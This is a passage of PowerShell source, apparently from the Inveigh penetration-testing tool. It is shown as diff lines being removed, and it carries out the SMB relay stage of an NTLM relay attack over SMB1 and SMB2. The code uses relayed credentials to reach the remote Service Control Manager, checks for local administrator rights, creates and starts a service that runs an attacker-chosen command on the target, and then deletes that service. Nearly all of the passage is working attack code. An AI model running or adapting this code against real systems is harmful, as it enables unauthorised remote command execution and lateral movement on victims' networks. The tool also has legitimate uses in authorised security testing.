- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'DeleteServiceW'
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'DeleteServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay command executed on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target")
- }
-
- }
-
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'CloseServiceHandle'
- $SMB_close_service_handle_stage = 1
- }
-
- 'CloseServiceHandle'
- {
-
- if($SMB_close_service_handle_stage -eq 1)
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
- $SMB_close_service_handle_stage++
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- }
- else
- {
- $SMB_client_stage = 'CloseRequest'
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
- }
-
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- }
-
- 'CloseRequest'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBCloseRequest 0x00,0x40
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'TreeDisconnect'
- }
-
- 'TreeDisconnect'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBTreeDisconnectRequest
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Logoff'
- }
-
- 'Logoff'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBLogoffAndXRequest
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Exit'
- }
-
- }
-
- if($SMB_relay_failed)
- {
- $inveigh.console_queue.Add("SMB relay failed on $Target")
- $SMB_client_stage = 'Exit'
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- }
-
- }
-
- }
- else
- {
-
- $SMB_client_stage = 'TreeConnect'
-
- :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
- {
-
- switch ($SMB_client_stage)
- {
-
- 'TreeConnect'
- {
- $SMB2_message_ID = 4
- $packet_SMB2_header = Get-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2TreeConnectRequest $SMB_path_bytes
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'CreateRequest'
- }
-
- 'CreateRequest'
- {
- $SMB2_tree_ID = 0x01,0x00,0x00,0x00
- $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
- $packet_SMB2_data["SMB2CreateRequestFile_Share_Access"] = 0x07,0x00,0x00,0x00
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'RPCBind'
- }
-
- 'RPCBind'
- {
- $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
- $SMB_file_ID = $SMB_client_receive[132..147]
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'OpenSCManagerW'
- }
-
- 'ReadRequest'
- {
-
- Start-Sleep -m 150
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_header["SMB2Header_CreditCharge"] = 0x10,0x00
- $packet_SMB2_data = Get-PacketSMB2ReadRequest $SMB_file_ID
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
- {
- $SMB_client_stage = $SMB_client_stage_next
- }
- else
- {
- $SMB_client_stage = 'StatusPending'
- }
-
- }
-
- 'StatusPending'
- {
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
- {
- $SMB_client_stage = $SMB_client_stage_next
- }
-
- }
-
- 'OpenSCManagerW'
- {
- $SMB2_message_ID = 30
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'CheckAccess'
- }
-
- 'CheckAccess'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
- $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($SCM_data.Length -lt $SMB_split_index)
- {
- $SMB_client_stage = 'CreateServiceW'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_First'
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'CreateServiceW'
- {
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'CreateServiceW_First'
- {
- $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $SMB2_message_ID += 20
- $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
- $packet_RPC_data = Get-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
- $SMB_split_index_tracker = $SMB_split_index
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage_final -le 2)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_split_stage = 2
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Middle'
- {
- $SMB_split_stage++
- $SMB2_message_ID++
- $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
- $SMB_split_index_tracker += $SMB_split_index
- $packet_RPC_data = Get-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage -ge $SMB_split_stage_final)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Last'
- {
- $SMB2_message_ID++
- $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
- $packet_RPC_data = Get-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'StartServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
- }
-
- $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
- $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
- $SMB_service_context_handle = $SMB_client_receive[112..131]
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'DeleteServiceW'
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'DeleteServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay command executed on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("SMB relay service $SMB_service failed to start on $Target")
- }
-
- }
-
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
